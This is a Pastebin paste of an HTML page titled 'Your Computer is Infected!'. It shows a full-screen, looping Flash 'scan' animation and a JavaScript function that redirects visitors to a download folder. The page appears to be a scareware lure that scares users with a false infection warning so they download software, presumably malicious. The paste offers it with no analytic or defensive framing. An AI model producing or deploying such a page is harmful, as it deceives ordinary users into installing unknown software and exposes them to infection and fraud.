Advertisement
Guest User

Untitled

a guest
Mar 8th, 2012
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.11 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
  3.     <head>
  4.         <title>Your Computer is Infected!</title>
  5.         <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  6.         <style type="text/css" media="screen">
  7.         html, body { width: 100%; height:100%; background-color: #ffffff;}
  8.         body { margin:0; padding:0; overflow:hidden; }
  9.         #flashContent { position: relative; width:100%; height:100%; margin: 0; padding:0; border: none; }
  10.         </style>
  11.     <script>
  12.         function download(){
  13.             window.location="./download/";
  14.         }
  15.     </script>
  16.     </head>
  17.     <body>
  18.         <div id="flashContent">
  19.             <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="100%" height="100%" id="scan1" align="middle">
  20.                 <param name="movie" value="scan1.swf" />
  21.                 <param name="quality" value="high" />
  22.                 <param name="bgcolor" value="#ffffff" />
  23.                 <param name="play" value="true" />
  24.                 <param name="loop" value="true" />
  25.                 <param name="wmode" value="gpu" />
  26.                 <param name="scale" value="showall" />
  27.                 <param name="menu" value="false" />
  28.                 <param name="devicefont" value="true" />
  29.                 <param name="allowscriptaccess" value="sameDomain" />
  30.                 <!--[if !IE]>-->
  31.                 <object type="application/x-shockwave-flash" data="scan1.swf" width="100%" height="100%">
  32.                     <param name="movie" value="scan1.swf" />
  33.                     <param name="quality" value="high" />
  34.                     <param name="bgcolor" value="#ffffff" />
  35.                     <param name="play" value="true" />
  36.                     <param name="loop" value="true" />
  37.                     <param name="wmode" value="gpu" />
  38.                     <param name="scale" value="showall" />
  39.                     <param name="menu" value="false" />
  40.                     <param name="devicefont" value="true" />
  41.                     <param name="allowscriptaccess" value="sameDomain" />
  42.                 <!--<![endif]-->
  43.                     <a href="http://www.adobe.com/go/getflash">
  44.                         <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" />
  45.                     </a>
  46.                 <!--[if !IE]>-->
  47.                 </object>
  48.                 <!--<![endif]-->
  49.             </object>
  50.         </div>
  51.     </body>
  52. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement